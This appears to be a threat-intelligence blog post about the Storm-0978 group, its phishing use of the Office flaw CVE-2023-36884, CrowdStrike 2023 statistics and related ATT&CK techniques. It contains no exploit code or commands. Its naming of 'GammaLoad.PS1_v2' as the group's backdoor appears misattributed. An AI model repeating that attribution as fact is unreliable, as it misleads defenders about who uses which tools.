In the ever-evolving landscape of cyber threats, a new actor has emerged on the scene: Storm-0978. This group, with its financial and espionage motives, has been conducting a series of sophisticated attacks, primarily through a well-orchestrated phishing campaign. The targets? Various organizations worldwide, including those in the financial sector and government institutions.

The Threat Actor: Storm-0978

Storm-0978 is a cyber threat actor group that has been observed to have both financial and espionage motives. The group uses a sophisticated backdoor named “GammaLoad.PS1_v2” to infiltrate targeted organizations. The backdoor allows the group to gain unauthorized access to the systems, enabling them to steal sensitive information or disrupt operations.

Insights from CrowdStrike

The CrowdStrike 2023 Global Threat Report provides additional insights into the activities of Storm-0978 and other similar threat actors. In 2022, CrowdStrike tracked over 200 adversaries, with a 95% increase in cloud exploitation and a 112% increase in access broker ads on the dark web.

Access brokers are threat actors who acquire credentials and access to organizations then provide or sell this access to other actors, including ransomware operators. The rise in their activities highlights the critical importance of identity threat protection in stopping breaches.

The report also highlights the increasing sophistication of adversaries and the growing threat to cloud environments. The average eCrime breakout time was 84 minutes, and 71% of the attacks were malware-free, indicating the advanced techniques used by these threat actors.

The Vulnerability: CVE-2023-36884

The attacks by Storm-0978 are associated with the vulnerability CVE-2023-36884, a remote code execution vulnerability affecting Windows and Office products. Microsoft is currently investigating this vulnerability and is aware of targeted attacks attempting to exploit it.

An attacker could create a specially crafted Microsoft Office document that enables them to perform remote code execution in the context of the victim. However, an attacker would have to convince the victim to open the malicious file. Microsoft is taking appropriate action to help protect its customers, which might include providing a security update through their monthly release process or providing an out-of-cycle security update, depending on customer needs.

For more detailed information about this vulnerability, you can visit the National Vulnerability Database (NVD) link.

MITRE ATT&CK TTPs

  • Initial Access: Spear-phishing (T1566) is often used for initial access. In this case, the threat actor sends emails that appear to be from trusted sources to trick the victims into revealing their credentials or downloading malicious files. T1566 Details
  • Execution: Execution is typically carried out through PowerShell (T1059.001), a task automation and configuration management framework from Microsoft. T1059.001 Details
  • Command and Control: The threat actor often uses common protocols (T1071) for command and control. This involves communicating with compromised systems to control them remotely. T1071 Details

Further Reading

To gain a deeper understanding of the Storm-0978 attacks and the broader cybersecurity landscape, consider exploring the following resources:

  1. CrowdStrike 2023 Global Threat Report: This comprehensive report provides insights into the latest trends in cyber threats, including the activities of over 200 adversaries and the increasing threat to cloud environments.
  2. Microsoft Security Blog: Microsoft’s official security blog offers a wealth of information on various cybersecurity topics, including detailed analyses of recent attacks and vulnerabilities.